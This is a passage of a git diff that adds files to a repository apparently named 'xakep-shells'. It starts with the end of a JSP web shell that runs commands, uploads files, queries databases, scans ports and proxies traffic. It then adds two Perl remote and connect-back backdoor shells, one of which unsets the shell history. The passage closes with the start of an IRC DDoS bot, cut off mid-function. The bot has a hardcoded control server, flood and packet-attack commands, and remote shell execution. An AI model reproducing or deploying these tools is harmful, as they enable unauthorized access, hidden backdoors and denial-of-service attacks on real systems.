||||
String httpHead=new String(bit,0,size);
|
||||
split=httpHead.indexOf("\nHost: ")+7;
|
||||
sendHostName=httpHead.substring(split, httpHead.indexOf("\n", split));
|
||||
//get the hostname and port
|
||||
if((split=sendHostName.indexOf(':'))!=-1){
|
||||
sendPort=Integer.parseInt(sendHostName.substring(split+1).trim());
|
||||
sendHostName=sendHostName.substring(0,split);
|
||||
sendSocket=new Socket(sendHostName.trim(),sendPort);
|
||||
}else{
|
||||
sendSocket=new Socket(sendHostName.trim(),80);
|
||||
}
|
||||
sendSocket.setSoTimeout(timeOut);
|
||||
//send user headhttp
|
||||
os=sendSocket.getOutputStream();
|
||||
os.write(httpHead.getBytes());
|
||||
//send user datas
|
||||
if(size==bit.length)
|
||||
while((size=is.read(bit, 0, bit.length))!=-1){
|
||||
os.write(bit,0 , size);
|
||||
}
|
||||
os.flush();
|
||||
//get WEBSITE html and user browser's output
|
||||
is=sendSocket.getInputStream();
|
||||
os=s.getOutputStream();
|
||||
|
||||
while((size=is.read(bit, 0, bit.length))!=-1){
|
||||
os.write(bit,0 , size);
|
||||
os.flush();
|
||||
}
|
||||
}catch(SocketException se){
|
||||
} catch (IOException ie) {
|
||||
} catch (Exception e) {
|
||||
}finally{
|
||||
//close the stream
|
||||
if(is!=null){
|
||||
try {
|
||||
is.close();
|
||||
} catch (IOException e) {
|
||||
}
|
||||
}
|
||||
if(os!=null){
|
||||
try {
|
||||
os.close();
|
||||
} catch (IOException e) {
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
//connection to the database
|
||||
void ConnectionDBM(JspWriter out,String driver,String url,String userName,String passWord,String sqlAction,String sqlCmd)throws Exception{
|
||||
DBM dbm=new DBM(driver,url,userName,passWord,out);
|
||||
if(sqlAction.equals("LDB")){
|
||||
dbm.lookInfo();
|
||||
}else{
|
||||
dbm.executeSQL(sqlCmd);
|
||||
}
|
||||
dbm.closeAll();
|
||||
}
|
||||
//database manager class
|
||||
class DBM{
|
||||
private JspWriter out;
|
||||
private Connection con;
|
||||
private Statement stmt;
|
||||
private ResultSet rs;
|
||||
public DBM(String driverName,String url,String userName,String passWord,JspWriter out)throws Exception{
|
||||
Class.forName(driverName);
|
||||
this.out=out;
|
||||
con=DriverManager.getConnection(url,userName,passWord);
|
||||
}
|
||||
public void lookInfo()throws Exception{
|
||||
DatabaseMetaData dbmd=con.getMetaData();
|
||||
String tableType=null;
|
||||
out.print("<strong>DataBaseInfo</strong><table>");
|
||||
out.print("<tr><td>DataBaseName:</td><td>"+dbmd.getDatabaseProductName()+"</td></tr>");
|
||||
out.print("<tr><td>DataBaseVersion:</td><td>"+dbmd.getDatabaseProductVersion()+"</td></tr>");
|
||||
out.print("<tr><td>the Numeric Function:</td><td>"+dbmd.getNumericFunctions()+"</td></tr>");
|
||||
out.print("<tr><td>the String Function:</td><td>"+dbmd.getStringFunctions()+"</td></tr>");
|
||||
out.print("<tr><td>the TimeDate Function:</td><td>"+dbmd.getTimeDateFunctions()+"</td></tr>");
|
||||
out.print("<tr><td>the System Function:</td><td>"+dbmd.getSystemFunctions()+"</td></tr>");
|
||||
out.print("</table>");
|
||||
out.print("<strong>ProcedureInfo</strong><table>");
|
||||
try{
|
||||
getProcedureDetail(dbmd.getProcedures(null,null,null));
|
||||
}catch(Exception proE){}
|
||||
|
||||
//show all the tables
|
||||
try{
|
||||
rs=dbmd.getTables(null,null,null,null);
|
||||
}catch(Exception tabE){}
|
||||
out.print("<strong>DataBase Tables Info</strong><br>");
|
||||
while(rs.next()){
|
||||
tableType=rs.getString(4);
|
||||
out.print("<strong>TableName:</strong>"+rs.getString(3)+" <strong>Type:</strong>"+tableType+"<br>");
|
||||
if(tableType.indexOf("VIEW")>=0||tableType.indexOf("TABLE")>=0){
|
||||
try{
|
||||
getTableDetail(dbmd.getColumns(null,null,rs.getString(3),null));
|
||||
}catch(Exception columnE){}
|
||||
}
|
||||
}
|
||||
this.closeAll();
|
||||
}
|
||||
//show the column information
|
||||
private void getTableDetail(ResultSet tableRs)throws Exception{
|
||||
out.print("<table border=1><tr><td>COLUMN_NAME</td><td>DATA_TYPE</td><td>TYPE_NAME</td><td>COLUMN_SIZE</td><td>IS_NULLABLE</td><td>CHAR_OCTET_LENGTH</td></tr>");
|
||||
while(tableRs.next()){
|
||||
out.print("<tr><td>"+tableRs.getString(4)+"</td><td>"+tableRs.getInt(5)+"</td><td>"+tableRs.getString(6)+"</td><td>"+tableRs.getInt(7)+"</td><td>"+tableRs.getString(18)+"</td><td>"+tableRs.getInt(16)+"</td></tr>");
|
||||
}
|
||||
out.print("</table>");
|
||||
tableRs.close();
|
||||
}
|
||||
//show all the procedures
|
||||
private void getProcedureDetail(ResultSet procRs)throws Exception{
|
||||
out.print("<table border=1><tr><td>PROCEDURE_NAME</td><td>REMARKS</td><td>PROCEDURE_TYPE</td></tr>");
|
||||
while(procRs.next()){
|
||||
out.print("<tr><td>"+procRs.getString(3)+"</td><td>"+procRs.getString(7)+"</td><td>"+procRs.getShort(8)+"</td></tr>");
|
||||
}
|
||||
out.print("</table>");
|
||||
procRs.close();
|
||||
}
|
||||
//run the sql command
|
||||
public void executeSQL(String sqlCmd)throws Exception{
|
||||
stmt=con.createStatement();
|
||||
if(sqlCmd.trim().toLowerCase().startsWith("select")){
|
||||
rs=stmt.executeQuery(sqlCmd);
|
||||
ResultSetMetaData rsmd=rs.getMetaData();
|
||||
int ColumnCount=rsmd.getColumnCount();
|
||||
out.print("<table border=1><tr>");
|
||||
for(int i=1;i<=ColumnCount;i++){
|
||||
out.print("<td>"+rsmd.getColumnName(i)+"</td>");
|
||||
}
|
||||
out.print("</tr>");
|
||||
while(rs.next()){
|
||||
out.print("</tr>");
|
||||
for(int i=1;i<=ColumnCount;i++){
|
||||
out.print("<td>"+rs.getString(i)+"</td>");
|
||||
}
|
||||
out.print("</tr>");
|
||||
}
|
||||
}else{
|
||||
stmt.executeUpdate(sqlCmd);
|
||||
out.print("execute success");
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
//close all the resource
|
||||
public void closeAll()throws SQLException{
|
||||
try{
|
||||
if(rs!=null)rs.close();
|
||||
}catch(Exception e){
|
||||
}
|
||||
try{
|
||||
if(stmt!=null)stmt.close();
|
||||
}catch(Exception e){
|
||||
}
|
||||
try{
|
||||
if(con!=null)con.close();
|
||||
}catch(Exception e){
|
||||
}
|
||||
}
|
||||
}
|
||||
//the other tools
|
||||
void systemTools(JspWriter out)throws Exception{
|
||||
out.print("<table border=1>");
|
||||
out.print("<tr><form method=post action='?Action=run'><td bordercolorlight=Black bgcolor=menu>System class run</td>");
|
||||
out.print("<td colspan=2>filepath:<input name=execFile size=75 type=text title='example d:\\cmd.exe /c dir c:'></td><td><input name=go type=submit value=run></td></form></tr>");
|
||||
out.print("<tr><form method=post enctype=\"multipart/form-data\" action='?Action=Upfile'><td bordercolorlight=Black bgcolor=menu>file upload</td>");
|
||||
out.print("<td colspan=2>file:<input name=file type=file>up to file<input title='d:\\1.txt' name=UPaddress size=35 type=text></td><td><input name=up onclick=\"this.form.action+='&UPaddress='+this.form.UPaddress.value;\" type=submit value=upl></td></form></tr>");
|
||||
out.print("<tr><form method=post action='?Action=EditFile'><td bordercolorlight=Black bgcolor=menu>new file</td><td colspan=2>file full name:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td>");
|
||||
out.print("</form></tr>");
|
||||
out.print("<tr><form method=post action='?Action=newFolder'><td bordercolorlight=Black bgcolor=menu>Create folder</td><td colspan=2>folder fullname:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td>");
|
||||
out.print("</form></tr>");
|
||||
out.print("<tr><form method=post action='?Action=APIreflect'><td bordercolorlight=Black bgcolor=menu>Reflect API</td><td colspan=2>Class Name:<input name=Filename title=java.lang.String type=text size=50></td><td><input name=submit type=submit value=ref></td>");
|
||||
out.print("</form></tr>");
|
||||
out.print("<tr><form method=post action='?Action=IPscan'><td bordercolorlight=Black bgcolor=menu>Scan Port</td><td>IP:<input name=IPaddress type=text size=20></td><td>Start Port:<input name=startPort title=1-65535 type=text size=5>End Port:<input name=endPort title=1-65535 type=text size=5></td><td><input name=submit type=submit value=sca></td>");
|
||||
out.print("</form></tr>");
|
||||
out.print("<tr><form method=post action='?Action=sql'>");
|
||||
out.print("<td bordercolorlight=Black bgcolor=menu>DBM");
|
||||
out.print("<select name=DB onChange='setDataBase(this.form);'><option>Sybase</option><option>Mssql</option><option>Mysql</option><option>Oracle</option><option>DB2</option><option>PostgreSQL</option></select></td><td>");
|
||||
out.print("Driver:<input name=driver type=text>URL:<input name=conUrl type=text>user:<input name=user type=text size=3>password:<input name=password type=text size=3></td>");
|
||||
out.print("<td>SqlCmd:<input type=text name=sqlcmd title='select * from admin'><input name=run type=submit value=Exec></td>");
|
||||
out.print("<td><input name=run type=submit value=LDB></td>");
|
||||
out.print("</form></tr>");
|
||||
if(!openHttpProxy){
|
||||
out.print("<tr><td><a href='?Action=HttpProxy' target=FileFrame>OpenTheHttpProxy</a></td></tr>");
|
||||
}else{
|
||||
out.print("<tr><td><a href='?Action=HttpProxy' target=FileFrame>CloseTheHttpProxy</a></td></tr>");
|
||||
}
|
||||
out.print("</table>");
|
||||
}
|
||||
//user interfaces==========================//
|
||||
void userInterFaces(JspWriter out)throws Exception{
|
||||
out.print("if u want to add an function ,u can coding in 'userInterFaces'function");
|
||||
|
||||
}
|
||||
//=========================================//
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
<%!
|
||||
String encodeChange(String str)throws Exception{
|
||||
if(str==null)
|
||||
return null;
|
||||
else
|
||||
return new String(str.getBytes("ISO-8859-1"),"gb2312");
|
||||
}
|
||||
String folderReplace(String folder){
|
||||
return folder.replace('\\','/');
|
||||
}
|
||||
String fOperation(boolean f,String file){
|
||||
if(f)
|
||||
return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\">Delete</a> <a href=\"javascript:reName('"+folderReplace(file)+"')\">Rename</a> <a href=\"javascript:setDate('"+folderReplace(file)+"')\">setDate</a> <a href=\"javascript:zipFile('"+folderReplace(file)+"')\">Zip</a>";
|
||||
else
|
||||
return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\">Delete</a> <a href=\"javascript:reName('"+folderReplace(file)+"')\">Rename</a> <a href=\"javascript:setDate('"+folderReplace(file)+"')\">setDate</a> <a href=\"javascript:copyFile('"+folderReplace(file)+"')\">Copy</a> <a href=\"javascript:editFile('"+folderReplace(file)+"')\">Edit</a> <a href=\"javascript:downFile('"+folderReplace(file)+"');\">Down</a>";
|
||||
}
|
||||
String getSize(long size){
|
||||
if(size>=1024*1024*1024){
|
||||
return new Long(size/1073741824L)+"G";
|
||||
}else if(size>=1024*1024){
|
||||
return new Long(size/1048576L)+"M";
|
||||
}else if(size>=1024){
|
||||
return new Long(size/1024)+"K";
|
||||
}else
|
||||
return size+"B";
|
||||
}
|
||||
String ico(int num){//ico
|
||||
return "<font face=wingdings size=3>&#"+num+"</font>";
|
||||
}
|
||||
String htmlEntity(String htmlCode){//html uncode
|
||||
htmlCode=htmlCode.replaceAll("&","&");
|
||||
htmlCode=htmlCode.replaceAll("<","<");
|
||||
return htmlCode.replaceAll(">",">");
|
||||
}
|
||||
%>
|
131
xakep-shells/PERL/Asmodeus v0.1.pl.txt
Normal file
131
xakep-shells/PERL/Asmodeus v0.1.pl.txt
Normal file
|
@ -0,0 +1,131 @@
|
|||
#!/usr/bin/perl
|
||||
|
||||
#
|
||||
|
||||
# Asmodeus v0.1
|
||||
|
||||
# Perl Remote Shell
|
||||
|
||||
# by phuket
|
||||
|
||||
# www.smoking-gnu.org
|
||||
|
||||
#
|
||||
|
||||
# (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
|
||||
|
||||
#
|
||||
|
||||
|
||||
|
||||
# perl asmodeus.pl client 6666 127.0.0.1
|
||||
|
||||
# perl asmodeus.pl server 6666
|
||||
|
||||
#
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
use Socket;
|
||||
|
||||
|
||||
|
||||
$cs=$ARGV[0];
|
||||
|
||||
$port=$ARGV[1];
|
||||
|
||||
$host=$ARGV[2];
|
||||
|
||||
|
||||
|
||||
if ($cs eq 'client') {&client}
|
||||
|
||||
elsif ($cs eq 'server') {&server}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
sub client{
|
||||
|
||||
socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
|
||||
|
||||
$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
|
||||
|
||||
$paddr=sockaddr_in("$port", $internet_addr);
|
||||
|
||||
connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
|
||||
|
||||
open(STDIN, ">&TO_SERVER");
|
||||
|
||||
open(STDOUT, ">&TO_SERVER");
|
||||
|
||||
open(STDERR, ">&TO_SERVER");
|
||||
|
||||
print "Asmodeus Perl Remote Shell\n";
|
||||
|
||||
system(date);
|
||||
|
||||
system("/bin/sh");
|
||||
|
||||
close(TO_SERVER);
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
sub server{
|
||||
|
||||
$proto=getprotobyname('tcp');
|
||||
|
||||
$0="asm";
|
||||
|
||||
$system='/bin/sh';
|
||||
|
||||
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
|
||||
|
||||
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
|
||||
|
||||
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
|
||||
|
||||
listen(SERVER, SOMAXCONN) or die "listen: $!";
|
||||
|
||||
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
|
||||
|
||||
open(STDIN, ">&CLIENT");
|
||||
|
||||
open(STDOUT, ">&CLIENT");
|
||||
|
||||
open(STDERR, ">&CLIENT");
|
||||
|
||||
print "Asmodeus Perl Remote Shell\n";
|
||||
|
||||
system(date);
|
||||
|
||||
system("/bin/sh");
|
||||
|
||||
close(STDIN);
|
||||
|
||||
close(STDOUT);
|
||||
|
||||
close(STDERR);
|
||||
|
||||
return;
|
||||
|
||||
}
|
||||
|
||||
}
|
61
xakep-shells/PERL/connectback2.pl.txt
Normal file
61
xakep-shells/PERL/connectback2.pl.txt
Normal file
|
@ -0,0 +1,61 @@
|
|||
#!/usr/bin/perl
|
||||
use IO::Socket;
|
||||
#WwW.CoM Security Hackers
|
||||
#coded bY: MasterKid
|
||||
#We Are: MasterKid, AleXutz, FatMan & MiKuTuL
|
||||
#Email: muzicteam2006@yahoo.com
|
||||
#
|
||||
#kid@SlackwareLinux:/home/programing$ perl dc.pl
|
||||
#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
|
||||
#
|
||||
#Usage: dc.pl [Host] [Port]
|
||||
#
|
||||
#Ex: dc.pl 127.0.0.1 2121
|
||||
#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
|
||||
#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
|
||||
#
|
||||
#[*] Resolving HostName
|
||||
#[*] Connecting... 127.0.0.1
|
||||
#[*] Spawning Shell
|
||||
#[*] Connected to remote host
|
||||
|
||||
#bash-2.05b# nc -vv -l -p 2121
|
||||
#listening on [any] 2121 ...
|
||||
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
|
||||
#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
|
||||
#
|
||||
#--==Systeminfo==--
|
||||
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
|
||||
#
|
||||
#--==Userinfo==--
|
||||
#uid=1001(lord) gid=100(users) groups=100(users)
|
||||
#
|
||||
#--==Directory==--
|
||||
#/root
|
||||
#
|
||||
#--==Shell==--
|
||||
#
|
||||
$system = '/bin/sh';
|
||||
$ARGC=@ARGV;
|
||||
print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n";
|
||||
if ($ARGC!=2) {
|
||||
print "Usage: $0 [Host] [Port] \n\n";
|
||||
die "Ex: $0 127.0.0.1 2121 \n";
|
||||
}
|
||||
use Socket;
|
||||
use FileHandle;
|
||||
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
|
||||
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
|
||||
print "[*] Resolving HostName\n";
|
||||
print "[*] Connecting... $ARGV[0] \n";
|
||||
print "[*] Spawning Shell \n";
|
||||
print "[*] Connected to remote host \n";
|
||||
SOCKET->autoflush();
|
||||
open(STDIN, ">&SOCKET");
|
||||
open(STDOUT,">&SOCKET");
|
||||
open(STDERR,">&SOCKET");
|
||||
print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n";
|
||||
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
|
||||
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
|
||||
system($system);
|
||||
#EOF
|
687
xakep-shells/PERL/perlbot.pl.txt
Normal file
687
xakep-shells/PERL/perlbot.pl.txt
Normal file
|
@ -0,0 +1,687 @@
|
|||
#!/usr/bin/perl
|
||||
# =========================
|
||||
# Perl Bot by LKY
|
||||
# Obrigado a italo, false e Ragde :D
|
||||
# =========================
|
||||
|
||||
# Componentes
|
||||
use IO::Socket;
|
||||
use Socket;
|
||||
use IO::Select;
|
||||
|
||||
# Configura??es
|
||||
my $servidor ='208.98.16.20';
|
||||
my $porta ='9002';
|
||||
my $nick =DDos;
|
||||
my $ircname = 'DDos';
|
||||
my $realname = "DDos";
|
||||
my @canais=("#SSH");
|
||||
my @adms=("Kelserific","Puna","nod32");
|
||||
#my $processo = '/bin/bash'; #se comantar nao mostra o PID
|
||||
|
||||
#Flood Control
|
||||
my $linas_max=6;
|
||||
my $sleep=3;
|
||||
|
||||
#Acesso a Shel - 1 ON 0 OFF
|
||||
my $secv = 1;
|
||||
|
||||
##############################
|
||||
my $VERSAO = '0.1';
|
||||
|
||||
$SIG{'INT'} = 'IGNORE';
|
||||
$SIG{'HUP'} = 'IGNORE';
|
||||
$SIG{'TERM'} = 'IGNORE';
|
||||
$SIG{'CHLD'} = 'IGNORE';
|
||||
$SIG{'PS'} = 'IGNORE';
|
||||
|
||||
chdir("/tmp/");
|
||||
$servidor="$ARGV[0]" if $ARGV[0];
|
||||
$0="$processo"."\0"x16;;
|
||||
my $pid=fork;
|
||||
exit if $pid;
|
||||
die "Problema com o fork: $!" unless defined($pid);
|
||||
|
||||
#diretorio,config do server e pid
|
||||
|
||||
chdir("/");
|
||||
$servidor="$ARGV[0]" if $ARGV[0];
|
||||
$0="$processo"."\0"x16;;
|
||||
my $pid=fork;
|
||||
exit if $pid;
|
||||
die "Problema com o fork: $!" unless defined($pid);
|
||||
|
||||
our %irc_servers;
|
||||
our %DCC;
|
||||
my $dcc_sel = new IO::Select->new();
|
||||
|
||||
#######
|
||||
#Bot em si!
|
||||
#######
|
||||
|
||||
$sel_cliente = new IO::Select();
|
||||
sub sendraw {
|
||||
if ($#_ == '1') {
|
||||
my $socket = $_[0];
|
||||
print $socket "$_[1]\n";
|
||||
} else {
|
||||
print $IRC_cur_socket "$_[0]\n";
|
||||
}
|
||||
}
|
||||
|
||||
sub conectar {
|
||||
my $meunick = $_[0];
|
||||
my $servidor_con = $_[1];
|
||||
my $porta_con = $_[2];
|
||||
|
||||
my $IRC_socket = new IO::Socket::INET(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
|
||||
if (defined($IRC_socket)) {
|
||||
$IRC_cur_socket = $IRC_socket;
|
||||
|
||||
$IRC_socket->autoflush(1);
|
||||
$sel_cliente->add($IRC_socket);
|
||||
|
||||
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
|
||||
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
|
||||
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
||||
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
|
||||
nick("$meunick");
|
||||
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
|
||||
sleep 1;
|
||||
}
|
||||
|
||||
}
|
||||
my $line_temp;
|
||||
while( 1 ) {
|
||||
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
|
||||
delete($irc_servers{''}) if (defined($irc_servers{''}));
|
||||
&DCC::connections;
|
||||
my @ready = $sel_cliente->can_read(0);
|
||||
next unless(@ready);
|
||||
foreach $fh (@ready) {
|
||||
$IRC_cur_socket = $fh;
|
||||
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
|
||||
$nread = sysread($fh, $msg, 4096);
|
||||
if ($nread == 0) {
|
||||
$sel_cliente->remove($fh);
|
||||
$fh->close;
|
||||
delete($irc_servers{$fh});
|
||||
}
|
||||
@lines = split (/\n/, $msg);
|
||||
|
||||
for(my $c=0; $c<= $#lines; $c++) {
|
||||
$line = $lines[$c];
|
||||
$line=$line_temp.$line if ($line_temp);
|
||||
$line_temp='';
|
||||
$line =~ s/\r$//;
|
||||
unless ($c == $#lines) {
|
||||
parse("$line");
|
||||
} else {
|
||||
if ($#lines == 0) {
|
||||
parse("$line");
|
||||
} elsif ($lines[$c] =~ /\r$/) {
|
||||
parse("$line");
|
||||
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
|
||||
parse("$line");
|
||||
} else {
|
||||
$line_temp = $line;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
sub parse {
|
||||
my $servarg = shift;
|
||||
if ($servarg =~ /^PING \:(.*)/) {
|
||||
sendraw("PONG :$1");
|
||||
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
|
||||
my $pn=$1; my $onde = $4; my $args = $5;
|
||||
if ($args =~ /^\001VERSION\001$/) {
|
||||
notice("$pn", "\001VERSION LKY bot-$VERSAO\001");
|
||||
}
|
||||
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
|
||||
if ($onde eq "$meunick"){
|
||||
shell("$pn", "$args");
|
||||
}
|
||||
if ($args =~ /^(\Q$meunick\E|\!hdr)\s+(.*)/ ) {
|
||||
my $natrix = $1;
|
||||
my $arg = $2;
|
||||
if ($arg =~ /^\!(.*)/) {
|
||||
ircase("$pn","$onde","$1") unless ($natrix eq "!hdr" and $arg =~ /^\!nick/);
|
||||
} elsif ($arg =~ /^\@(.*)/) {
|
||||
$ondep = $onde;
|
||||
$ondep = $pn if $onde eq $meunick;
|
||||
bfunc("$ondep","$1");
|
||||
} else {
|
||||
shell("$onde", "$arg");
|
||||
}
|
||||
}
|
||||
}
|
||||
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
|
||||
if (lc($1) eq lc($meunick)) {
|
||||
$meunick=$4;
|
||||
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
||||
}
|
||||
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
|
||||
nick("$meunick".int rand(9999));
|
||||
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
|
||||
$meunick = $2;
|
||||
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
||||
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
|
||||
foreach my $canal (@canais) {
|
||||
sendraw("JOIN $canal");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub bfunc {
|
||||
my $printl = $_[0];
|
||||
my $funcarg = $_[1];
|
||||
if (my $pid = fork) {
|
||||
waitpid($pid, 0);
|
||||
} else {
|
||||
if (fork) {
|
||||
exit;
|
||||
} else {
|
||||
if ($funcarg =~ /^portscan (.*)/) {
|
||||
my $hostip="$1";
|
||||
my @portas=("21","22","23","25","53","80","110","143","6667","59","7000","110","65535","0");
|
||||
my (@aberta, %porta_banner);
|
||||
foreach my $porta (@portas) {
|
||||
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
|
||||
if ($scansock) {
|
||||
push (@aberta, $porta);
|
||||
$scansock->close;
|
||||
}
|
||||
}
|
||||
|
||||
if (@aberta) {
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
|
||||
} else {
|
||||
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
|
||||
}
|
||||
}
|
||||
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
|
||||
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
|
||||
$dtime = 1 if $dtime == 0;
|
||||
my %bytes;
|
||||
$bytes{igmp} = $2 * $pacotes{igmp};
|
||||
$bytes{icmp} = $2 * $pacotes{icmp};
|
||||
$bytes{o} = $2 * $pacotes{o};
|
||||
$bytes{udp} = $2 * $pacotes{udp};
|
||||
$bytes{tcp} = $2 * $pacotes{tcp};
|
||||
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :4STATUS - LKY");
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :14Tempo:1 $dtime"."s");
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total pacotes:1 ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total bytes:1 ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :14M?dia de envio:4 ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
|
||||
|
||||
|
||||
}
|
||||
exit;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub ircase {
|
||||
my ($kem, $printl, $case) = @_;
|
||||
|
||||
if ($case =~ /^join (.*)/) {
|
||||
j("$1");
|
||||
}
|
||||
if ($case =~ /^part (.*)/) {
|
||||
p("$1");
|
||||
}
|
||||
if ($case =~ /^rejoin\s+(.*)/) {
|
||||
my $chan = $1;
|
||||
if ($chan =~ /^(\d+) (.*)/) {
|
||||
for (my $ca = 1; $ca <= $1; $ca++ ) {
|
||||
p("$2");
|
||||
j("$2");
|
||||
}
|
||||
} else {
|
||||
p("$chan");
|
||||
j("$chan");
|
||||
}
|
||||
}
|
||||
if ($case =~ /^op/) {
|
||||
op("$printl", "$kem") if $case eq "op";
|
||||
my $oarg = substr($case, 3);
|
||||
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
||||
}
|
||||
if ($case =~ /^deop/) {
|
||||
deop("$printl", "$kem") if $case eq "deop";
|
||||
my $oarg = substr($case, 5);
|
||||
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
||||
}
|
||||
if ($case =~ /^voice/) {
|
||||
voice("$printl", "$kem") if $case eq "voice";
|
||||
$oarg = substr($case, 6);
|
||||
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
||||
}
|
||||
if ($case =~ /^devoice/) {
|
||||
devoice("$printl", "$kem") if $case eq "devoice";
|
||||
$oarg = substr($case, 8);
|
||||
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
||||
}
|
||||
if ($case =~ /^msg\s+(\S+) (.*)/) {
|
||||
msg("$1", "$2");
|
||||
}
|
||||
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
|
||||
for (my $cf = 1; $cf <= $1; $cf++) {
|
||||
msg("$2", "$3");
|
||||
}
|
||||
}
|
||||
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
|
||||
ctcp("$1", "$2");
|
||||
}
|
||||
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
|
||||
for (my $cf = 1; $cf <= $1; $cf++) {
|
||||
ctcp("$2", "$3");
|
||||
}
|
||||
}
|
||||
if ($case =~ /^invite\s+(\S+) (.*)/) {
|
||||
invite("$1", "$2");
|
||||
}
|
||||
if ($case =~ /^nick (.*)/) {
|
||||
nick("$1");
|
||||
}
|
||||
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
|
||||
conectar("$2", "$1", 6667);
|
||||
}
|
||||
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
|
||||
DCC::SEND("$1", "$2");
|
||||
}
|
||||
if ($case =~ /^raw (.*)/) {
|
||||
sendraw("$1");
|
||||
}
|
||||
if ($case =~ /^eval (.*)/) {
|
||||
eval "$1";
|
||||
}
|
||||
}
|
||||
sub shell {
|
||||
return unless $secv;
|
||||
my $printl=$_[0];
|
||||
my $comando=$_[1];
|
||||
if ($comando =~ /cd (.*)/) {
|
||||
chdir("$1") || msg("$printl", "Diert?? inexistente!");
|
||||
return;
|
||||
}
|
||||
elsif ($pid = fork) {
|
||||
waitpid($pid, 0);
|
||||
} else {
|
||||
if (fork) {
|
||||
exit;
|
||||
} else {
|
||||
my @resp=`$comando 2>&1 3>&1`;
|
||||
my $c=0;
|
||||
foreach my $linha (@resp) {
|
||||
$c++;
